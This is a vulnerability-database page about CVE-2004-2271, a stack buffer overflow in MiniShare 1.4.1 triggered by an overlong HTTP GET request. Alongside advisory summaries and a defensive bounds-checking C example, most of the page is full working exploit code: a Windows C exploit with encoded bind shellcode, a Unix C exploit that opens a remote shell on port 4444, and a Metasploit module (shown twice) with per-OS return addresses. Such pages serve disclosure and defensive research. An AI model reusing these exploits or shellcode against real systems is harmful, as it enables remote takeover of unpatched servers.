CVE-2004-2271
CVSS 7.5
Published: 2004-12-31 00:00:00
Revised: 2008-09-05 16:43:40

[Original] Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD] MiniShare overlong URL handling remote arbitrary command execution vulnerability (CNNVD-200412-1075)

        
        MiniShare is a file sharing system.
        MiniShare does not handle overlong URL requests correctly; a remote attacker can exploit this to overflow a buffer in the service and possibly execute arbitrary instructions with the privileges of the process.
        An attacker submits an overlong HTTP GET request to trigger the buffer overflow; carefully constructed request data may allow arbitrary instructions to be executed with the privileges of the process.
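As an added example (not MiniShare's source and not any of the exploits reproduced further down), the following C shows the bounds check whose absence this entry describes: the GET request-target is measured and byte-checked before it is copied into a fixed buffer, and the same checks double as a detection rule for requests of the shape the public exploits send. MAX_TARGET, the status codes and the function names are assumptions; the 1787-byte filler in the sample is the distance to the saved return address reported by the exploits on this page.

```c
/* Request-line handling with the bounds check MiniShare 1.4.1 lacked.  Added
 * illustration of the bug class, not MiniShare's source; MAX_TARGET is an
 * assumed server-side limit, and the 1787-byte filler in the sample is the
 * distance to the saved return address reported by the exploits on this page. */
#include <stddef.h>
#include <string.h>

#define MAX_TARGET 1024                /* assumed upper bound for a request-target */
enum req_status {
    REQ_OK        =  0,
    REQ_MALFORMED = -1,                /* not "GET <target> HTTP/..."             */
    REQ_TOO_LONG  = -2,                /* target longer than MAX_TARGET or out    */
    REQ_BAD_BYTE  = -3                 /* control or non-ASCII byte in the target */
};
/* Vulnerable shape, for contrast:  char link[N]; strcpy(link, uri_start);
 * Here the target is measured and checked before a single byte is copied.
 * reqlen is the raw request length; req need not be NUL-terminated. */
enum req_status parse_get_target(const char *req, size_t reqlen,
                                 char *out, size_t outsz)
{
    const char *start, *sp;
    size_t tlen, i;

    if (reqlen < 4 || memcmp(req, "GET ", 4) != 0)
        return REQ_MALFORMED;
    start = req + 4;
    sp = memchr(start, ' ', reqlen - 4);           /* bounded scan, not strchr */
    if (sp == NULL || sp == start)
        return REQ_MALFORMED;
    if ((size_t)(req + reqlen - sp) < 6 || memcmp(sp, " HTTP/", 6) != 0)
        return REQ_MALFORMED;
    tlen = (size_t)(sp - start);
    if (tlen > MAX_TARGET || tlen >= outsz)       /* reject before copying */
        return REQ_TOO_LONG;
    for (i = 0; i < tlen; i++) {                   /* a URL is printable ASCII; */
        unsigned char c = (unsigned char)start[i]; /* addresses and code are not */
        if (c < 0x21 || c > 0x7e)
            return REQ_BAD_BYTE;
    }
    memcpy(out, start, tlen);
    out[tlen] = '\0';
    return REQ_OK;
}

static int status_of(const char *req, size_t reqlen)
{
    char out[MAX_TARGET + 1];
    return (int)parse_get_target(req, reqlen, out, sizeof out);
}

/* Constructed sample requests (not captured traffic). */
int demo_normal_request(void)
{
    const char req[] = "GET /share/report.pdf HTTP/1.1\r\nHost: x\r\n\r\n";
    return status_of(req, sizeof req - 1);                 /* REQ_OK */
}
int demo_overlong_request(void)
{
    static char req[4 + 2191 + 11];      /* "GET " + 2191-byte target + " HTTP/1.1\r\n" */
    memcpy(req, "GET ", 4);
    memset(req + 4, 'A', 2191);          /* 1787 filler bytes plus 404 more */
    memcpy(req + 4 + 2191, " HTTP/1.1\r\n", 11);
    return status_of(req, sizeof req);                     /* REQ_TOO_LONG */
}
int demo_control_byte_request(void)
{
    const char req[] = "GET /a\001b HTTP/1.1\r\n";         /* 0x01 inside the target */
    return status_of(req, sizeof req - 1);                 /* REQ_BAD_BYTE */
}
```

A server built this way never reaches the copy for the 2191-byte target, and a proxy or IDS applying the same two checks to the request line flags it without needing a signature for any particular payload.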
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2271
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2271
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1075
(official data source) CNNVD

- Other links and resources

http://www.osvdb.org/11530
(PATCH)  OSVDB  11530
http://sourceforge.net/project/shownotes.php?release_id=241158
(PATCH)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=241158
http://secunia.com/advisories/13114
(VENDOR_ADVISORY)  SECUNIA  13114
http://xforce.iss.net/xforce/xfdb/17978
(UNKNOWN)  XF  minishare-address-link-bo(17978)
http://www.securityfocus.com/bid/11620
(UNKNOWN)  BID  11620
http://www.securiteam.com/exploits/6X00B1PBPC.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/6X00B1PBPC.html
http://securitytracker.com/id?1012106
(UNKNOWN)  SECTRACK  1012106
http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html
(VENDOR_ADVISORY)  FULLDISC  20041107 [New VULNERABILTY + Exploit] MiniShare, Minimal HTTP Server for Windows, Remote Buffer Overflow Exploit

- Vulnerability information

MiniShare overlong URL handling remote arbitrary command execution vulnerability
High severity  Boundary condition error
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Vendor patch:
        MiniShare
        ---------
        The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:
        
        http://minishare.sourceforge.net/

- Vulnerability information (616)

MiniShare <= 1.4.1 Remote Buffer Overflow Exploit (EDBID:616)
windows remote
2004-11-07 Verified
80 class101
N/A
/*



MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.
Bind a shellcode to the port 101.

Full disclosure and exploit 
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
07 november 2004

Thanx to HDMoore and Metasploit.com for their kickass ASM work.


------------------
WHAT IS MINISHARE
------------------

Homepage - http://minishare.sourceforge.net/
	
	MiniShare is meant to serve anyone who has the need to share files to anyone,
	doesn't have a place to store the files on the web, 
    and does not want or simply does not have the skill
	and possibility to set up and maintain a complete HTTP-server software...

--------------
VULNERABILITY
--------------

	A simple buffer overflow in the link length, nothing more
	read the code for further instructions.

----
FIX
----

	Actually none, the vendor is contacted the same day published, 1 hour before you.
    As a nice fuck to NGSS , iDEFENSE and all others private disclosures
	homo crew ainsi que K-OTiK, ki se tap' des keu dans leur "Lab"
	lol :->

----
EXTRA
----
   
	Update the JMP ESP if you need. A wrong offset will crash minishare.
	Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English
	Others MiniShare's versions aren't tested.
    Tip: If it crashes for you , try to play with Sleep()...

----
BY
----

    class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
						 who
						greets
    DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet

*/




#include "winsock2.h"
#include "fstream.h"

#pragma comment(lib, "ws2_32")




//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore. 

char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

/*

//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English

char scode+[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\xF5\x3C\x4E\xCD\x7C\xFA\x4E\xCD"
"\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x70\xEC\x4E\xCD\x71\xE1\x4E\xCD"
"\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x75\xF0\x4E\xCD\x76\xED\x4E\xCD"
"\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\xE8\x75\x6E\xFF\x77\x58\xE0\x89"
"\x88\x88\x88\x30\xEB\x10\x6F\xFF\x77\x58\x68\x61\x63\x6B\x90";

//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English

char scode+[]=
"LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tkafhXMfXf1Dkbf1TkbjgY0Lkd0TkdfhH"
"CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0Lks0tks0Tkuj1Y0Lkw0tkw0tkyCjyY0"
"Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tkzCCjPX0Dkz0TkzCC0tkzCCjfY0Lkz0T"
"kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0TkzCCj3X0Dkz0tkzCC0tkzCCjOX0Dkz"
"0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tkzCjRY0LkzCfhNUfXf1Dkzf1TkzCCCfh"
"hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0TkzCCfhzhfXf1Dkzf1TkzUvB3tLHCiS"
"r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EOahpucTrEjPG2LLwhGhR4ciGcgSwzG";

*/

static char payload[5000];

char espxp1en[]="\x33\x55\xdc\x77"; //JMP ESP - user32.dll   - WinXP SP1 English
char esp2k4en[]="\xb8\x9e\xe3\x77"; //JMP ESP - user32.dll   - Win2k SP4 English
char espnt6en[]="\xf8\x29\xf3\x77"; //JMP ESP - kernel32.dll - WinNT SP6 English

void usage(char* us);
WSADATA wsadata;
void ver();

int main(int argc,char *argv[])
{
	ver();
	if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>3)){usage(argv[0]);return -1;} // three targets are listed, so accept 1..3
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
	int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;
	char *target, *os;
	if (argc==4){port=atoi(argv[3]);}
	else port=80;
	if (atoi(argv[1]) == 1){target=espxp1en;os="WinXP SP1 English";}
	if (atoi(argv[1]) == 2){target=esp2k4en;os="Win2k SP4 English";}
	if (atoi(argv[1]) == 3){target=espnt6en;os="WinNT SP6 English";}
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;
	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
	cout<<"[+] target: "<<os<<endl;			
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ip);
	server.sin_port=htons(port);
	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	switch(select(s+1,NULL,&mask,NULL,&timeout))
	{
		case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
		case 0: {cout<<"[+] connection failed."<<endl;closesocket(s);return -1;}
		default:
		if(FD_ISSET(s,&mask))
		{
			cout<<"[+] connected, constructing the payload..."<<endl;
			Sleep(1000);
			sizeA=1787;
			sizeB=414-sizeof(scode);
			sizeC=10;
			sz=sizeA+sizeB+sizeC+sizeof(scode)+17;
			memset(payload,0,sizeof(payload));
			strcat(payload,"GET ");
			for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
			strcat(payload,target);
			for (b=0;b<sizeB;b++){strcat(payload,"\x41");}
			strcat(payload,scode);
			for (c=0;c<sizeC;c++){strcat(payload,"\x41");}
			strcat(payload," HTTP/1.1\r\n\r\n");
			Sleep(1000);
		    if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
			Sleep(1000);
			cout<<"[+] size of payload: "<<sz<<endl;			
			cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
			return 0;
		}
	}
	closesocket(s);
	WSACleanup();
	return 0;
}


void usage(char* us) 
{  
	cout<<"USAGE: 101_mini.exe Target Ip Port\n"<<endl;
	cout<<"TARGETS:                               "<<endl;
	cout<<"      [+] 1. WinXP SP1 English (*)"<<endl;
	cout<<"      [+] 2. Win2k SP4 English (*)"<<endl;
	cout<<"      [+] 3. WinNT SP6 English (*)"<<endl;
	cout<<"NOTE:                               "<<endl;
	cout<<"      The port 80 is default if no port specified"<<endl;
	cout<<"      The exploit bind a shellcode to the port 101"<<endl;
	cout<<"      A wildcard (*) mean Tested."<<endl;
	return;
} 

void ver()
{	
cout<<endl;
cout<<"                                                                   "<<endl;
cout<<"        ===================================================[v0.1]===="<<endl;
cout<<"        ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1====="<<endl; 
cout<<"        =============Remote Buffer Overflow Exploit=================="<<endl;
cout<<"        ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
cout<<"        ============================================================="<<endl;
cout<<"                                                                   "<<endl;
}

// milw0rm.com [2004-11-07]
		

- Vulnerability information (636)

MiniShare Remote Buffer Overflow Exploit (c source) (EDBID:636)
windows remote
2004-11-16 Verified
80 NoPh0BiA
N/A
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2

***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***

[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

E:\Program Files\MiniShare>

Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>     /* bzero */
#include <unistd.h>      /* read, write, close, sleep */
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */
#include <fcntl.h>

#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/

char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\x34\x0a\x7c\xa8\x62"
"\x5d\xa4\x91\x10\x12\xa4\xb8\x08\x81\x7b\xf8\x4c\x0b\xc5\x76\x7e"
"\x12\xa4\xa7\x14\x0b\xc4\x1e\x06\x43\xa4\xc9\xbf\x0b\xc1\xcc\xcb"
"\xf6\x1e\x3d\x98\x32\xcf\x89\x33\xcb\xe0\xf0\x35\xcd\xc4\x0f\x0f"
"\x76\x0b\xe9\x41\xeb\xa4\xa7\x10\x0b\xc4\x9b\xbf\x06\x64\x76\x6e"
"\x16\x2e\x16\xbf\x0e\xa4\xfc\xdc\xe1\x2d\xcc\xf4\x55\x71\xa0\x6f"
"\xc8\x27\xfd\x6a\x60\x1f\xa4\x50\x81\x36\x76\x6f\x06\xa4\xa6\x28"
"\x81\x34\x76\x6f\x02\x7c\x95\xba\x44\x21\x11\xcb\xdc\xa6\x3a\xb5"
"\xe6\x2f\xfc\x34\x0a\x78\xab\x67\x83\xca\x15\x13\x0a\x2f\xfd\xa4"
"\x0b\x2f\xfd\x82\x13\x37\x1a\x90\x13\x5f\x14\xd1\x43\xa9\xb4\x90"
"\x10\x5f\x3a\x90\xa7\x01\x14\xed\x03\xda\x50\xff\xe7\xd3\xc6\x63"
"\x59\x1d\xa2\x07\x38\x2f\xa6\xb9\x41\x0f\xac\xcb\xdd\xa6\x22\xbd"
"\xc9\xa2\x88\x20\x60\x28\xa4\x65\x59\xd0\xc9\xbb\xf5\x7a\xf9\x6d"
"\x83\x2b\x73\xd6\xf8\x04\xda\x60\xf5\x18\x02\x61\x3a\x1e\x3d\x64"
"\x5a\x7f\xad\x74\x5a\x6f\xad\xcb\x5f\x03\x74\xf3\x3b\xf4\xae\x67"
"\x62\x2d\xfd\x25\x56\xa6\x1d\x5e\x1a\x7f\xaa\xcb\x5f\x0b\xae\x63"
"\xf5\x7a\xd5\x67\x5e\x78\x02\x61\x2a\xa6\x3a\x5c\x49\x62\xb9\x34"
"\x83\xcc\x7a\xce\x3b\xef\x70\x48\x2e\x83\x97\x21\x53\xdc\x56\xb3"
"\xf0\xac\x11\x60\xcc\x6b\xd9\x24\x4e\x49\x3a\x70\x2e\x13\xfc\x35"
"\x83\x53\xd9\x7c\x83\x53\xd9\x78\x83\x53\xd9\x64\x87\x6b\xd9\x24"
"\x5e\x7f\xac\x65\x5b\x6e\xac\x7d\x5b\x7e\xae\x65\xf5\x5a\xfd\x5c"
"\x78\xd1\x4e\x22\xf5\x7a\xf9\xcb\xda\xa6\x1b\xcb\x7f\x2f\x95\x99"
"\xd3\x2a\x33\xcb\x5f\x2b\x74\xf7\x60\xd0\x02\x02\xf5\xfc\x02\x41"
"\x0a\x47\x0d\xbe\x0e\x70\x02\x61\x0e\x1e\x26\x67\xf5\xff\xfd";

struct sockaddr_in hrm;

void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;

while(1) {
FD_ZERO(&fd_read);   /* the set must be cleared on every iteration before FD_SET */
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);

if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}

if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}

int conn(char *ip, int p)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(p);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0 )
{
perror("connect");
exit(0);
}
return sockfd;
}

int main(int argc, char *argv[])
{
if(argc < 2)
{
printf("Usage: TARGET.\n");
exit(0);
}
char *buffer = malloc(2221),*B=malloc(31),*target=argv[1]; /* one extra byte each for the NUL that strcat writes */
int x,y;
printf("\n***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***\n\n");
memset(buffer,'\0',2221);
memset(B,0x42,30); B[30]='\0'; /* strcat needs B terminated */
memset(buffer,0x41,1787);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode); /* 1787+4+30+399 = 2220 bytes, the length written below */
if((x = conn(target,PORT)))
printf("[x] Connected to: %s on port %d.\n",target,PORT);
sleep(3);
printf("[x] Sending bad code..");
write(x,"GET ",4);
write(x,buffer,2220);
write(x," HTTP/1.1\r\n\r\n",13);
sleep(3);
printf("done.\n");
printf("[x] Trying to connect to: %s on port %d..\n",target,PORT1);
if((y=conn(target,PORT1)))
{
printf("[x] 0wn3d!\n\n");
shell(y);
}
return 0;
}

// milw0rm.com [2004-11-16]
		

- Vulnerability information (16754)

Minishare 1.4.1 Buffer Overflow (EDBID:16754)
windows remote
2010-05-09 Verified
80 metasploit
N/A
##
# $Id: minishare_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Minishare 1.4.1 Buffer Overflow',
			'Description'    => %q{
					This is a simple buffer overflow for the minishare web
				server. This flaw affects all versions prior to 1.4.2. This
				is a plain stack buffer overflow that requires a "jmp esp" to reach
				the payload, making this difficult to target many platforms
				at once. This module has been successfully tested against
				1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
			},
			'Author'         => [ 'acaro <acaro@jervus.it>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-2271'],
					[ 'OSVDB', '11530'],
					[ 'BID', '11620'],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
					'MinNops'  => 64,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp
					['Windows 2000 SP4 English',     { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp
					['Windows XP SP0-SP1 English',   { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret
					['Windows XP SP2 English',       { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret
					['Windows 2003 SP0 English',     { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret
					['Windows NT 4.0 SP6',           { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp
					['Windows XP SP2 German',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
					['Windows XP SP2 Polish',        { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
					['Windows XP SP2 French',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
				],
			'DisclosureDate' => 'Nov 7 2004'))
	end

	def exploit
		uri = rand_text_alphanumeric(target['Rets'][0])
		uri << [target['Rets'][1]].pack('V')
		uri << payload.encoded

		print_status("Trying target address 0x%.8x..." % target['Rets'][1])
		send_request_raw({
			'uri' => uri
		}, 5)

		handler
	end

end
		

- Vulnerability information (F82959)

Minishare 1.4.1 Buffer Overflow (PacketStormID:F82959)
2009-11-26 00:00:00
acaro  metasploit.com
exploit,web,overflow
CVE-2004-2271

This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack overflow that requires a "jmp esp" to reach the payload, making this difficult to target many platforms at once. This Metasploit module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Minishare 1.4.1 Buffer Overflow',
			'Description'    => %q{
				This is a simple buffer overflow for the minishare web
				server. This flaw affects all versions prior to 1.4.2. This
				is a plain stack overflow that requires a "jmp esp" to reach
				the payload, making this difficult to target many platforms
				at once. This module has been successfully tested against
				1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
					
			},
			'Author'         => [ 'acaro <acaro@jervus.it>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2271'],
					[ 'OSVDB', '11530'],
					[ 'BID', '11620'],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
					'MinNops'  => 64,
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp
					['Windows 2000 SP4 English',     { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp
					['Windows XP SP0-SP1 English',   { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret
					['Windows XP SP2 English',       { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret
					['Windows 2003 SP0 English',     { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret
					['Windows NT 4.0 SP6',           { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp
					['Windows XP SP2 German',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
					['Windows XP SP2 Polish',        { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
					['Windows XP SP2 French',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
				],
			'DisclosureDate' => 'Nov 7 2004'))
	end

	def exploit
		uri = rand_text_alphanumeric(target['Rets'][0])
		uri << [target['Rets'][1]].pack('V')
		uri << payload.encoded
		
		print_status("Trying target address 0x%.8x..." % target['Rets'][1])
		send_request_raw({
			'uri' => uri
		}, 5)
			
		handler
	end

end
    

- Vulnerability information

11530
MiniShare HTTP GET Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in MiniShare. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2004-11-07 Unknown
2004-11-07 Unknown

- Solution

Upgrade to version 1.4.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credit

- Vulnerability information

MiniShare Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 11620
Yes No
2004-11-08 12:00:00 2008-12-29 09:22:00
This vulnerability was disclosed by "class 101" <class101@phreaker.net>.

- Affected program versions

MiniShare Minimal HTTP Server 1.4.1

- Discussion

MiniShare is prone to a remote buffer-overflow vulnerability because it fails to sufficiently verify buffer boundaries before copying user-supplied data.

Exploiting this vulnerability allows remote attackers to execute arbitrary code in the context of the affected application.

MiniShare 1.4.1 is reported vulnerable; other versions may also be affected.

- Exploit

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Proof-of-concept exploits are available, including an exploit for the Metasploit Framework (minishare_get_overflow.pm).

- Solution

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References

 

 
